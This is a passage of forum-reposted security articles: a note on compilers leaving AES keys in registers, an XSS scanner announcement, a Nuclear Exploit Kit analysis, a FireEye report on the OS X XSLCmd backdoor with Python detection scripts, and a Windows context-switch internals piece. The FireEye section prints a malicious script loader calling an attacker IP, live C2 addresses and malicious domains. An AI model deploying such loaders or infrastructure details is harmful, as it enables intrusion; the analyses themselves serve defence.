Even without register allocation bugs, however, all compilers will store temporary values on the stack from time to time, and there is no legal way to sanitize these from within C. (I know that at least one developer, when confronted by this problem, decided to sanitize his stack by zeroing until he triggered a page fault — but that is an extreme solution, and is both non-portable and very clear C "undefined behaviour".) One might expect that the situation with sensitive data left behind in registers is less problematic, since registers are liable to be reused more quickly; but in fact this can be even worse. Consider the "XMM" registers on the x86 architecture: They will only be used by the SSE family of instructions, which is not widely used in most applications — so once a value is stored in one of those registers, it may remain there for a long time. One of the rare instances those registers are used by cryptographic code, however, is for AES computations, using the "AESNI" instruction set. It gets worse. Nearly every AES implementation using AESNI will leave two values in registers: The final block of output, and the final round key. For encryption operations these aren't catastrophic things to leak — the final block of output is ciphertext, and the final AES round key, while theoretically dangerous, is not enough on its own to permit an attack on AES — but the situation is very different for decryption operations: The final block of output is plaintext, and the final AES round key is the AES key itself (or the first 128 bits of the key for AES-192 and AES-256). I am absolutely certain that there is software out there which inadvertently keeps an AES key sitting in an XMM register long after it has been wiped from memory. 
As with "anonymous" temporary space allocated on the stack, there is no way to sanitize the complete CPU register set from within portable C code — which should probably come as no surprise, since C, being designed to be a portable language, is deliberately agnostic about the registers and even the instruction set of the target machine. Let me say that again: It is impossible to safely implement any cryptosystem providing forward secrecy in C. If compiler authors care about security, we need a new C language extension. After discussions with developers — of both cryptographic code and compilers — over the past couple of years I propose that a function attribute be added with the following meaning: "This function handles sensitive information, and the compiler must ensure that upon return all system state which has been used implicitly by the function has been sanitized." While I am not a compiler developer, I don't think this is an entirely unreasonable feature request: Ensuring that registers are sanitized can be done via existing support for calling conventions by declaring that every register is callee-save, and sanitizing the stack should be easy given that the compiler knows precisely how much space it has allocated. With such a feature added to the C language, it will finally be possible — in combination with memset_s from C11 — to write code which obtains cryptographic keys, uses them without leaking them into other parts of the system state, and then wipes them from memory so that a future system compromise can't reveal the keys. People talk a lot about forward secrecy; it's time to do something about it. But until we get that language extension, all we can do is hope that we're lucky and our leaked state gets overwritten before it's too late. That, and perhaps avoid using AESNI instructions for AES-128 decryptions. Sursa: Zeroing buffers is insufficient
 - 
JSPwn - JavaScript Static Code Analysis

Copyright: Duarte Monteiro (etraud123) - JSPwn; Nishant Das Patnaik (nishant.dp@) - JsPrime; Paul Theriault (pauljt) - ScanJS

JSPwn is a modified version of ScanJS + JSPrime. This tool allows developers to detect sinks and sources in their applications and find XSS vulnerabilities and DOM XSS (beta). Using ScanJS's engine to detect vulnerabilities and JSPrime's code-flow feature, the tool can both detect the vulnerable point and backtrack through the code.

Example
Open app: node server.js
Go to: http://localhost:4000/client/#/scan
Select File from folder
Enable REGEXP Custom

Link: https://github.com/Etraud123/JSpwn
 - 
[h=3]Nuclear Exploit Kit and Flash CVE-2014-0515[/h]

For this blog, we'd like to walk you through a recent attack involving Nuclear Exploit Kit (EK) that we analyzed. It was found leveraging CVE-2014-0515, a buffer overflow in Adobe Flash Player discovered in April 2014. Nuclear Exploit Kit targets a number of known vulnerabilities including:

pdf - PDF:Exploit.PDF-JS
swf - CVE-2014-0515
jar - CVE-2012-0507

Below are the files which were downloaded during the exploitation attempts observed:

FILE TYPE | MD5 | SIZE | CVE/THREAT | VT HITS
FLASH | A1465ECE32FA3106AA88FD666EBF8C78 | 5614 | CVE-2014-0515 | 18 / 53
JAR | A93F603A95282B80D8AFD3F23C4D4889 | 12396 | CVE-2012-0507 | 26 / 54
PDF | 19ED55EF17A49451D8052D0B51C66239 | 9770 | Exploit.PDF-JS | 22 / 54
EXE | 8BCE8A59F9E789BEFB9D178C9A03FB66 | 104960 | Win32/Zemot | 39 / 53

Although there are other associated vulnerabilities exploited by Nuclear Exploit Kit, we will limit this blog post to reviewing the Flash exploitation (CVE-2014-0515).

Nuclear EK Landing

Unlike other EKs such as RIG, Nuclear EK's landing page code is highly obfuscated. (Fig 1: Obfuscated Landing Page) After de-obfuscation, the page looks as follows: (Fig 2: De-Obfuscated Landing Page) Nuclear EK's landing page checks for the following antivirus (AV) driver files and, if it finds any, terminates the exploitation process. We have seen these checks before in RIG EK too. (Fig 3: Check for AV driver files) If this AV check is passed, a JavaScript function then checks the installed Flash version and, if a vulnerable version is detected in the client's browser, a call is made to a dynamic Flash object creation module. (Fig 4: Flash Call) Here are the vulnerable Flash player checks: (Fig 5: Checks if vulnerable version installed) If the version check passes, the Flash exploitation process will commence as seen below.

CVE-2014-0515 exploit analysis

Here is the code that dynamically creates a new Flash object: (Fig 6: Flash Object Creation) The Flash exploit payload that gets downloaded is highly obfuscated to evade AV detection. Below is a snippet of decompiled code from this Flash exploit: (Fig 7: Decompiled Flash File) There are two hard-coded snippets of obfuscated shellcode in the ActionScript, as seen below: (Fig x1, x2: Raw Shellcodes) After de-obfuscating them at run time, it adds bytecode to a Shader object from one of the de-obfuscated shellcode snippets. (Fig 8: Shader Byte Code Filler) The Shader's Pixel Bender is where this malformed bytecode is written, which triggers the vulnerability. Here is the malformed bytecode: (Fig 9: Malformed data for Pixel Shader)

Disassembling Pixel Bender's byte code

We used Tinic Uro's program to decompile the Pixel Bender binary data. (Fig 10: Decompiled PixelBender data) We can see the inappropriate content here. The Shader object takes a float parameter whose default value is set to a 4x4 matrix of floats, and the second float value of this matrix is an invalid value that triggers the vulnerability.

Conclusion

Since the downfall of the popular Blackhole Exploit Kit, we have seen the advent of many new exploit kits. Nuclear Exploit Kit definitely ranks in the top 5 prevalent EKs in the wild at the moment. We have seen an increasing number of compromised sites and scam pages leading to Nuclear Exploit Kit in the past three months. Some of the notable compromised sites during this time frame that were redirecting to Nuclear EK include:

SocialBlade.com - A YouTube statistics tracking site
AskMen.com - Men's entertainment website
Facebook.com survey scam pages

Exploit kits generally make use of known vulnerabilities, and Flash is a popular target. CVE-2014-0515 in particular targets a Flash vulnerability in Flash versions before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux. It is critical to ensure that your employees are not running outdated versions of Flash, as it is commonly targeted by EKs.

References:
Adobe ActionScript 3 (AS3) API Reference
http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf
kaourantin.net: Pixel Bender .pbj files
JPEXS Free Flash Decompiler - Download
Malware-Traffic-Analysis.net

- Rubin Azad

Sursa: Zscaler Research: Nuclear Exploit Kit and Flash CVE-2014-0515
 - 
	Forced to Adapt: XSLCmd Backdoor Now on OS X September 4, 2014 | By James T. Bennett and Mike Scott Introduction FireEye Labs recently discovered a previously unknown variant of the APT backdoor XSLCmd – OSX.XSLCmd – which is designed to compromise Apple OS X systems. This backdoor shares a significant portion of its code with the Windows-based version of the XSLCmd backdoor that has been around since at least 2009. This discovery, along with other industry findings, is a clear indicator that APT threat actors are shifting their eyes to OS X as it becomes an increasingly popular computing platform. Across the global threat landscape, there has been a clear history of leveraging (or porting) Windows malware to the Apple OS X platform. In 2012, AlienVault discovered a document file exploiting an older vulnerability in Microsoft Word that installs a backdoor named “MacControl” on OS X systems. The group responsible for those attacks had been targeting Tibetan non-government organizations (NGOs). It was later discovered that the code for this backdoor was borrowed from an existing Windows backdoor, whose source code can be found on several Chinese programming forums. In 2013, Kaspersky reported on a threat actor group they named “IceFog” that had been attacking a large number of entities related to military, mass media, and technology in South Korea and Japan. This group developed their own backdoor for both Windows and OS X. And just this year, Kaspersky published a report on a group they named “Careto/Mask” that utilized an open source netcat-like project designed to run on *nix and Windows systems named ‘sbd’ which they wrapped in a custom built installer for OS X. Based on our historical intelligence, we believe the XSLCmd backdoor is used by APT, including a group that we call “GREF.” We track this threat group as “GREF” due to their propensity to use a variety of Google references in their activities – some of which will be outlined later in this report. 
Our tracking of GREF dates back to at least the 2009 timeframe, but we believe they were active prior to this time as well. Historically, GREF has targeted a wide range of organizations including the US Defense Industrial Base (DIB), electronics and engineering companies worldwide, as well as foundations and other NGOs, especially those with interests in Asia.

XSLCmd for OS X Analysis

The XSLCmd backdoor for OS X was submitted to VirusTotal (MD5: 60242ad3e1b6c4d417d4dfeb8fb464a1) on August 10, 2014, with 0 detections at the time of submission. The sample is a universal Mach-O executable file supporting the PowerPC, x86, and x86-64 CPU architectures. The code within contains both an installation routine that is carried out the first time it is executed on a system, and the backdoor routine which is carried out after confirming that its parent process is launchd (the initial user mode process of OS X that is responsible for, amongst other things, launching daemons). The backdoor code was ported to OS X from a Windows backdoor that has been used extensively in targeted attacks over the past several years, having been updated many times in the process. Its capabilities include a reverse shell, file listings and transfers, installation of additional executables, and an updatable configuration. The OS X version of XSLCmd includes two additional features not found in the Windows variants we have studied in depth: key logging and screen capturing.

Installation Routine

To install, XSLCmd first determines the endianness of the CPU using NXGetLocalArchInfo and whether or not it is running as the super user by comparing the return value of getuid() with 0. The code includes functions to handle endianness differences when dealing with file and network data on a system using big endian, namely older Apple computers that shipped with PowerPC CPUs. 
The process copies its Mach-O from its current location to $HOME/Library/LaunchAgents/clipboardd and creates a plist file in the same directory with the name com.apple.service.clipboardd.plist. The latter file ensures that the backdoor is launched after the system is rebooted once the user logs in. After this is done, the malware relaunches itself using the ‘load’ option of the launchctl utility, which runs the malware according to its configuration in the plist file it created, with launchd as its parent process. This is the process that begins the actual backdoor routine of waiting for and executing commands issued from the C2 server. After running itself with launchctl, the initial process forks and deletes the Mach-O from the original location from which it was executed. The installation routine differs slightly depending on whether or not the process is running with super user privileges. If run as super user, it copies itself to /Library/Logs/clipboardd. Interestingly, if run as super user, the process will also copy /bin/ksh to /bin/ssh. /bin/ksh is the Korn shell executable, and if the user sends a command to initialize a reverse shell, it will use the copy of ksh to do so instead of /bin/bash. This is likely done to make it less obvious that a reverse shell is running on the system, since it may raise less suspicion to see an ssh process opening a network socket rather than a bash process, although the real ssh executable is actually located in /usr/bin/ssh, not /bin/ssh. A list of possible files created by XSLCmd is included in Appendix 1 at the end of this blog. Configuration Options XSLCmd ships with an encrypted configuration file that it defaults to if there is no configuration file written to disk. It will only write its configuration file to disk if it’s updated by the user. It runs in a loop, checking for a configuration update, and then checking for commands. 
If a new configuration is available, it will be written to disk in base64 encoding at $HOME/.fontset/pxupdate.ini. Below is the configuration data stored in the XSLCmd sample we obtained.

[ListenMode] 0
[MServer] 61.128.110.38:8000
[BServer] 61.128.110.38
[Day] 1,2,3,4,5,6,7
[Start Time] 00:00:00
[End Time] 23:59:00
[Interval] 60
[MWeb] http://1234/config.htm
[BWeb] http://1234/config.htm
[MWebTrans] 0
[BWebTrans] 0
[FakeDomain] www.appleupdate.biz
[Proxy] 0
[Connect] 1
[Update] 0
[UpdateWeb] not use

[MServer] and [BServer] specify the main and backup C2 server addresses, which can be either an IP address or domain name. Only [MServer] needs to specify a port. [Day] specifies which days of the week the malware will poll for commands and configuration updates, where Monday is 1. [Start Time] specifies the local time of day to begin polling. [End Time] specifies the local time of day to stop polling. [Interval] specifies the number of seconds between polls. [MWeb] and [BWeb] specify the main and backup URLs to poll for configuration updates, respectively. Update checks are not performed if these values are left at their default: http://1234/config.htm Other options will be explained where appropriate later in the blog.

C2 Protocol

XSLCmd uses pseudo-HTTP for its protocol. It opens a socket and uses a string template to set up the HTTP request or response headers depending on whether or not it was configured for [Listen Mode]. If [Listen Mode] is set to 1, then it listens on its socket, waiting for a connection, to which it replies with HTTP response headers following this template:

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Server: Apache/2.0.54 (Unix)
Content-Encoding: gzip
Content-Length: %d

The body after the headers, regardless of mode, will contain data specific to the purpose of the communication. 
The data is encrypted with a scheme lifted from a game server engine written by a group named “My Destiny Team.” The request headers have an interesting feature where the Host and Referer header values will have their domain values populated with the value stored in [Fake Domain]. This value can be any string and has no effect on the network connection established. The value of the ‘s’ argument in the request URL is randomly generated, and all of the other request header values except for Content-Length are hard-coded. Another interesting feature exists for the configuration update function. If [MWebTrans]/[bWebTrans] is set to 1, the configuration update URL request will be proxied through Yahoo’s Babelfish service and will fall back to the Google Translate service if that fails. As you can see, the ‘trurl’ parameter in the URL will be set to whatever is configured for [MWeb]/[bWeb]. The User-Agent header for this request is hard-coded and contains the computer name in the parentheses at the end. SSL certificate strings were noticed during our analysis, but with no direct cross-reference to the certificate data. However, there was a cross-reference to the data directly preceding it. This data began with what looked like SSL handshake headers, so we extracted the data from the executable, wrapped it in a PCAP file, and opened it in Wireshark. Interestingly, the data contains everything needed for the server-side packets of an SSL handshake. The SSL certificate being used was for login.live.com and had expired on 6/16/2010. The code using this data opens a socket, waits for a connection, and proceeds to carry out an SSL handshake with the client, throwing away whatever data it receives. This code is not directly referenced by any other code in the executable but could very well replace the [Listen Mode] code. Perhaps it is an old feature no longer in use, a new feature yet to be fully implemented, or an optional feature only used in certain cases. 
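A responder who recovers the $HOME/.fontset/pxupdate.ini copy of the configuration described above wants the C2 endpoints, the fake Host/Referer domain and the polling schedule without decoding it by hand. The following Python is an added example, not FireEye's code or the malware's: it base64-decodes the blob, parses the bracketed keys, and pulls out the indicators to pivot on. The sample configuration is constructed from the values reported in this post; the exact line layout of the real on-disk file is an assumption, and the parser only relies on the "[Key]" markers (matched case-insensitively, so either spelling of the key names works).

```python
import base64
import re
from ipaddress import ip_address

# Constructed sample: the values reported for the OS X sample, laid out one
# "[Key] value" pair per line and base64-encoded the way the write-up says the
# on-disk copy at $HOME/.fontset/pxupdate.ini is stored. The line layout is an
# assumption; the parser below only relies on the bracketed keys.
SAMPLE_CONFIG_PLAINTEXT = """[ListenMode] 0
[MServer] 61.128.110.38:8000
[BServer] 61.128.110.38
[Day] 1,2,3,4,5,6,7
[Start Time] 00:00:00
[End Time] 23:59:00
[Interval] 60
[MWeb] http://1234/config.htm
[BWeb] http://1234/config.htm
[MWebTrans] 0
[BWebTrans] 0
[FakeDomain] www.appleupdate.biz
[Proxy] 0
[Connect] 1
[Update] 0
[UpdateWeb] not use
"""
SAMPLE_CONFIG_B64 = base64.b64encode(SAMPLE_CONFIG_PLAINTEXT.encode()).decode()

# Default update URL; per the write-up, update polling is skipped when left at this.
DEFAULT_UPDATE_URL = "http://1234/config.htm"

# "[Key]" followed by everything up to the next "[" is that key's value.
KV_RE = re.compile(r"\[([^\]]+)\]([^\[]*)")


def parse_xslcmd_config(encoded_b64: str) -> dict:
    """Decode the base64 blob and return {lower-cased key: stripped value}."""
    raw = base64.b64decode(encoded_b64).decode("utf-8", errors="replace")
    return {key.strip().lower(): value.strip() for key, value in KV_RE.findall(raw)}


def is_ip_literal(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def extract_indicators(cfg: dict) -> dict:
    """Pull out what a responder pivots on: C2 endpoints, non-default update
    URLs, the fake Host/Referer domain, and the polling schedule."""
    c2 = []
    for key in ("mserver", "bserver"):
        value = cfg.get(key, "")
        if not value:
            continue
        host, _, port = value.partition(":")
        c2.append({"host": host, "port": int(port) if port.isdigit() else None,
                   "ip_literal": is_ip_literal(host), "role": key})
    update_urls = [cfg[k] for k in ("mweb", "bweb")
                   if cfg.get(k) and cfg[k] != DEFAULT_UPDATE_URL]
    days = [int(d) for d in cfg.get("day", "").split(",") if d.strip().isdigit()]
    interval = cfg.get("interval", "")
    schedule = {"days": days, "start": cfg.get("start time"),
                "end": cfg.get("end time"),
                "interval_seconds": int(interval) if interval.isdigit() else None}
    return {"listen_mode": cfg.get("listenmode") == "1",
            "c2": c2, "update_urls": update_urls,
            "fake_domain": cfg.get("fakedomain"), "schedule": schedule,
            "translate_proxy": cfg.get("mwebtrans") == "1" or cfg.get("bwebtrans") == "1"}


if __name__ == "__main__":
    indicators = extract_indicators(parse_xslcmd_config(SAMPLE_CONFIG_B64))
    for name, value in indicators.items():
        print(name, value)
```

The translate_proxy flag matters for network hunting: when it is set, the update request goes out to Yahoo's Babelfish or Google Translate rather than to the configured URL, so the update URL will only appear as a parameter in the proxied request.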
Observations We noticed a mix of manually constructed and plain referenced strings throughout the code, sometimes side-by-side in the same function even. This gives the impression of someone working with someone else’s code, adding his own touch and style here and there as he goes. Also of note is that XSLCmd will not perform key logging if run as super user. This can be a problem, because the API used to perform the key logging, CGEventTapCreate, when invoked with the parameters it uses, requires root permissions from the calling process or the “Assistive Devices” feature must be enabled for the application. During the initial installation, there is a routine to programmatically enable assistive devices that will be executed if the OS X version is not 10.8. In 10.9, enabling assistive devices permissions is done on a per application basis with no direct API to achieve this. It is interesting to note that the version check does not account for versions above 10.8, indicating that perhaps 10.8 was the latest version at the time the code was written, or at least the most common. Further supporting this inference is the lack of testing performed on 10.9. This variant uses an API from the private Admin framework that is no longer exported in 10.9, causing it to crash. The effort to support PowerPC with the endian conversion functions is worth mentioning. Coupling this observation with the aforementioned fact that elsewhere in the code, the version of OS X is compared with 10.8, one could deduce that efforts were made to be backwards compatible with older OS X systems. For some frame of reference, Apple’s first OS to drop support for PowerPC was OS X 10.6 released in 2009, and OS X 10.9 was released in October of 2013. Threat Actor Intelligence Historical Background While GREF’s targeting interests overlap with many of the other threat groups we track, their TTP’s are somewhat unique. 
GREF is one of the few APT threat groups that does not rely on phishing as their primary attack method. While they have been known to utilize phishing emails, including malicious attachments and links to exploit sites, they were one of the early adopters of strategic web compromise (SWC) attacks. GREF was especially busy in the 2010 timeframe, during which they had early access to a number of 0-day exploits including CVE-2010-0806 (IE 6-7 Peer Objects vuln), CVE-2010-1297 (Adobe Flash vuln), and CVE-2010-2884 (Adobe Flash) that they leveraged in both phishing and SWC attacks. Many of their SWC attacks we saw in this time period were hosted on defense industry-related sites including Center for Defense Information (cdi.org), National Defense Industrial Association (ndia.org), Interservice/Industry Training, Simulation and Education Conference (iitsec.org), and satellite company Millennium Space Systems (millennium-space.com). Most of those attacks involved embedding links to exploit code in the homepage of the affected website, and true to their moniker the link was usually placed inside an existing Google Analytics code block in the page source code to help obscure it, rather than simply appended to the end of the file like many other attackers did.

Figure 1: Sample "google" exploit link

<!-- Google Tracking Code -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://");
document.write(unescape("%3Cscript src='" + gaJsHost + "180.149.252.181/wiki/tiwiki.ashx' type='text/javascript'%3E%3C/script%3E"));
</script>

The TTP that most differentiates GREF from other APT threat groups is their unrelenting targeting of web server vulnerabilities to both gain entry to targeted organizations, as well as to get new platforms for SWC attacks. 
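The Figure 1 snippet hides the loader in what looks like a standard Google Analytics block, so someone skimming the page source sees a familiar shape. The check that survives that disguise is to resolve what document.write(unescape(...)) actually emits and look at the host it loads from. The following Python is an added example, not part of the FireEye report: it reassembles the string literals in each such call, URL-decodes them, and flags any script source whose host is not a Google Analytics host, noting when it is a bare IP literal. The HTML page is constructed for the example around the snippet shown above; the expected-host list is an assumption.

```python
import re
from ipaddress import ip_address
from urllib.parse import unquote

# Constructed sample page: the loader shown in Figure 1 (pointing at the
# 180.149.252.181 host named in the write-up) next to a loader of the same
# shape that fetches the real ga.js. Only the first should be flagged.
SAMPLE_PAGE = """<html><body>
<!-- Google Tracking Code -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://");
document.write(unescape("%3Cscript src='" + gaJsHost + "180.149.252.181/wiki/tiwiki.ashx' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
</body></html>
"""

# Assumption: the hosts a genuine Google Analytics loader of that era pointed at.
EXPECTED_GA_HOSTS = {"google-analytics.com", "www.google-analytics.com",
                     "ssl.google-analytics.com"}

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
DOCWRITE_RE = re.compile(r"document\.write\s*\(\s*unescape\s*\((.*?)\)\s*\)", re.S)
STRLIT_RE = re.compile(r"(['\"])(.*?)\1", re.S)
SRC_RE = re.compile(r"src\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def emitted_markup(arg: str) -> str:
    """Join the string literals of a JS concatenation and URL-decode the result.
    Non-literal pieces (such as the gaJsHost variable) are dropped, which
    leaves the host and path of the src intact."""
    return unquote("".join(lit for _, lit in STRLIT_RE.findall(arg)))


def host_of(src: str) -> str:
    """Host component of a src value, with or without a scheme prefix."""
    without_scheme = re.sub(r"^[a-z][a-z0-9+.-]*://", "", src, flags=re.I)
    return without_scheme.split("/", 1)[0].lower()


def is_ip_literal(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def find_injected_loaders(html: str) -> list:
    """Return the script sources written via document.write(unescape(...))
    whose host is not an expected Google Analytics host."""
    findings = []
    for script_body in SCRIPT_RE.findall(html):
        for arg in DOCWRITE_RE.findall(script_body):
            for src in SRC_RE.findall(emitted_markup(arg)):
                host = host_of(src)
                if host not in EXPECTED_GA_HOSTS:
                    findings.append({"src": src, "host": host,
                                     "ip_literal": is_ip_literal(host)})
    return findings


if __name__ == "__main__":
    for finding in find_injected_loaders(SAMPLE_PAGE):
        print(finding)
```

Run against a crawl of your own site's pages, the output is a short list of loaders worth a manual look; an IP-literal host inside a tracking block is the pattern this post describes.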
This threat group appears to devote more resources (than most other groups) in attempting to penetrate web servers, and generally, they make no attempt to obscure the attacks, often generating gigabytes of traffic in long-running attacks. They are known to utilize open-source tools such as SQLMap to perform SQL injection, but their most obvious tool of choice is the web vulnerability scanner Acunetix, which leaves tell-tale request patterns in web server logs. They have been known to leverage vulnerabilities in ColdFusion, Tomcat, JBoss, FCKEditor, and other web applications to gain access to servers, and then they will commonly deploy a variety of web shells relevant to the web application software running on the server to access and control the system. Another historical TTP attributed to GREF was their frequent re-use of specific IP ranges to both perform reconnaissance and launch their attacks, as well as for command and control and exfiltration of data. In the early years, we documented them routinely using IP addresses in the 210.211.31.x (China Virtual Telecom – Hong Kong), 180.149.252.x (Asia Datacenter – Hong Kong), and 120.50.47.x (Qala – Singapore). In addition, their reconnaissance activities frequently included referrer headers from google.com and google.com.hk with search features such as “inurl” and “filetype” looking for specific systems, technologies, and known vulnerabilities. C2 Domains GREF is known to have sometimes configured their malware to bare IP addresses, rather than domains, but there are some clusters of domain registrants that we attribute to them. 
Table 1: GREF domain registrations

Domain | Registrant Email Address
allshell[.]net | cooweb51[@]hotmail.com
attoo1s[.]com | cooweb51[@]hotmail.com
kasparsky[.]net | cooweb51[@]hotmail.com
kocrmicrosoft[.]com | cooweb51[@]hotmail.com
microsoft.org[.]tw | cooweb51[@]hotmail.com
microsoftdomainadmin[.]com | cooweb51[@]hotmail.com
microsoftsp3[.]com | cooweb51[@]hotmail.com
playncs[.]com | cooweb51[@]hotmail.com
softwareupdatevmware[.]com | cooweb51[@]hotmail.com
windowsnine[.]net | cooweb51[@]hotmail.com
cdngoogle[.]com | metasploit3[@]google.com
cisco-inc[.]net | metasploit3[@]google.com
mremote[.]biz | metasploit3[@]google.com
officescan[.]biz | metasploit3[@]google.com
oprea[.]biz | metasploit3[@]google.com
battle.com[.]tw | 6g8wkx[@]gmail.com
diablo-iii[.]mobi | 6g8wkx[@]gmail.com
microsoftupdate[.]ws | 6g8wkx[@]gmail.com
msftncsl[.]com | 6g8wkx[@]gmail.com
square-enix[.]us | 6g8wkx[@]gmail.com
updatamicrosoft[.]com | 6g8wkx[@]gmail.com
powershell.com[.]tw | 6g8wkx[@]gmail.com
gefacebook[.]com | 6g8wkx[@]gmail.com
attoo1s[.]com | 6g8wkx[@]gmail.com
msnupdate[.]bz | skydrive1951[@]hotmail.com
googlemapsoftware[.]com | skydrive1951[@]hotmail.com

XSLCmd Usage

For the majority of the time we’ve been tracking them, XSLCmd has been the “go-to” backdoor for GREF, as shown by the wide range of compile dates for the Windows samples we have: from 2009-01-05 to 2013-08-01. Appendix 2 provides a partial list of Windows sample hashes and configuration metadata. Since Mach-O binaries do not have a compile timestamp like Windows executables, we can only infer from other data when the OS X variant was developed. As mentioned above, the “FakeDomain” was configured to “www.appleupdate[.]biz”, which was originally registered on August 2, 2012, and the registration appears to have updated on August 7, 2014, but the registrant is still the same “cast west”. When we found the sample on August 10, the domain did not resolve and there were no historical records for appleupdate[.]biz in any of the passive DNS (pDNS) sources we checked. In the intervening weeks, it has been seen by pDNS sensors, with the first query occurring on August 12, 2014 (which could be related to our research, since the hits are ‘nxdomain’), and then on August 16, 2014 there are pDNS records pointing to 61.128.110.38, which you’ll notice is the same IP the OS X version was configured to use. This could hint at the possibility that this OS X port of XSLCmd was recently developed and deployed; however, this remains uncertain.

Other Backdoor Usage

In addition to XSLCmd, GREF has utilized a number of other backdoors over time. 
Another backdoor unique to them, which we call "ddrh", is a limited-feature backdoor that was frequently dropped in the SWC attacks in 2010 but has not been seen much since. Another historical backdoor attributed to GREF is one known as ERACS or Trojan.LURKER (not to be confused with the LURK0 variant of Gh0st). This full-featured backdoor includes the usual backdoor functionality, including support for additional modules, but it also includes a USB monitoring capability that generates a directory listing of USB-connected devices. We have also observed GREF using a handful of other common backdoors, including Poison Ivy, Gh0st, 9002/HOMEUNIX, HKDoor, and Briba, but these occurrences have been pretty rare. All of the GREF 9002/HOMEUNIX samples in our repository have compile dates from 2009 or 2010. Interestingly enough, there is some overlap with a cluster detailed in a report we released in November of last year, specifically the "AllShell" cluster (C2: smtp.allshell[.]net). Starting in mid-2012, GREF started using the Kaba/SOGU backdoor. These early samples, which were discussed in great detail by LastLine in their blog post "An Analysis of PlugX," are usually bundled into a RAR self-extracting executable and use the three-part loading mechanism consisting of an executable, the malicious DLL that is side-loaded, and the shellcode file. In mid-2013, GREF switched to using a new Kaba/SOGU builder that created binaries with unique metadata. For example, many of these samples create a mutex of "PST-2.0" when executed, and some have the shared "HT Applications" version metadata.
Conclusion

The "A" in APT is generally used to describe the threat actors as "Advanced", but with this blog we also see that they are "Adaptable." Not only have they adopted new Windows-based backdoors over time; as Apple's OS X platform has increased in popularity in many companies, they have logically adapted their toolset to match, in order to gain and maintain a persistent foothold in the organizations they are targeting. OS X has gained popularity across enterprises, from less savvy users who find it easy to operate, to highly technical users who utilize its more powerful features, as well as with executives. Many people also consider it to be a more secure computing platform, which may lead to a dangerous sense of complacency in both IT departments and among users. In fact, while the security industry has started offering more products for OS X systems, these systems are sometimes less regulated and monitored in corporate environments than their Windows peers. Clearly, as the OS X platform becomes more widely adopted across enterprises, threat groups like GREF will continue to adapt and find ways to exploit that platform.

Credit to Jay Smith for his initial analysis of the Windows version of the XSLCmd backdoor and Joshua Homan for his assistance in this research.
Appendix 1: XSLCmd for OS X created files

Filename : Purpose
$HOME/Library/LaunchAgents/clipboardd : executable
/Library/Logs/clipboardd : executable when run as super user
$HOME/Library/LaunchAgents/com.apple.service.clipboardd.plist : plist for persistence
$HOME/.fontset/pxupdate.ini : configuration file
$HOME/.fontset/chkdiska.dat : additional configuration file
$HOME/.fontset/chkdiskc.dat : additional configuration file
$HOME/Library/Logs/BackupData/<year><month><day>_<hr>_<min>_<sec>_keys.log : key log file

Source: Forced to Adapt: XSLCmd Backdoor Now on OS X | FireEye Blog
 - 
Windows Internals - A look into SwapContext routine

Hi, here I am really taking advantage of my summer vacation and back again with a second part of the Windows thread scheduling articles. In the previous blog post I discussed the internals of quantum-end context switching (a flowchart). However, the routine responsible for context switching itself wasn't discussed in detail, and that's why I'm here today.

Here are some notes that'll help us through this post:

1 - The routine which contains the code that does the context switching is SwapContext, and it's called internally by KiSwapContext. Some routines prefer to call SwapContext directly and do the housekeeping that KiSwapContext does themselves.
2 - The routines above (KiSwapContext and SwapContext) are involved in ALL context switches, no matter what the reason for the context switch is (preemption, wait state, termination...).
3 - SwapContext is originally written in assembly and doesn't have the prologue or epilogue normally seen in ordinary calling conventions; imagine it like a naked function.
4 - Neither SwapContext nor KiSwapContext is responsible for setting the CurrentThread and NextThread fields of the current KPRCB. It is the responsibility of the caller to store the new thread's KTHREAD pointer into pPrcb->CurrentThread and to queue the current thread (we're still running in its context) in the ready queue before calling KiSwapContext or SwapContext, which will actually perform the context switch. Usually, before calling KiSwapContext, the old IRQL (before raising it to DISPATCH_LEVEL) is stored in CurrentThread->WaitIrql, but there's an exception discussed later in this article.

So buckle up and let's get started.

Before digging through SwapContext, let's first examine what its callers supply to it as arguments. SwapContext expects the following:
- ESI : (PKTHREAD) A pointer to the new thread's structure.
- EDI : (PKTHREAD) A pointer to the old thread's structure.
- EBX : (PKPCR) A pointer to the PCR (Processor Control Region) structure of the current processor.
- ECX : (KIRQL) The IRQL at which the thread was running before it was raised to DISPATCH_LEVEL.

By callers, I mean the KiSwapContext routine and the routines that call SwapContext directly (e.g. KiDispatchInterrupt).

Let's start by seeing what's happening inside KiSwapContext. This routine expects two arguments, the current thread's and the new thread's KTHREAD pointers, in ECX and EDX respectively (__fastcall). Before storing both arguments in EDI and ESI, it first saves these and other registers on the current thread's (soon the old thread's) stack:
EBP : The stack frame base pointer (SwapContext only updates ESP).
EDI : The caller might be using EDI for something else; save it.
ESI : The caller might be using ESI for something else; save it too.
EBX : The caller might be using EBX for something else; save it too.

Note that these registers will be popped from this same thread's stack when the context is switched from another thread back to this thread at a later time (when it is rescheduled to run). After pushing the registers, KiSwapContext stores the self pointer to the PCR in EBX (fs:[1Ch]). Then it stores the CurrentThread->WaitIrql value in ECX. Now that everything is set up, KiSwapContext is ready to call SwapContext.

Again, before going through SwapContext, let me talk about the routines that call SwapContext directly, specifically the KiDispatchInterrupt routine referenced in my previous post. Why doesn't KiDispatchInterrupt call KiSwapContext? Simply because it only needs to push EBP, EDI and ESI onto the current thread's stack, as it already uses EBX as a pointer to the PCR. Here we can see a real advantage of software context switching: we save only the registers that really need saving, not all of them.

Now we can get to SwapContext and explain what it does in detail. The return type of SwapContext is a boolean value that tells the caller (on the new thread's stack) whether the new thread has any APCs to deliver or not. Let's see what SwapContext does in these 15 steps:

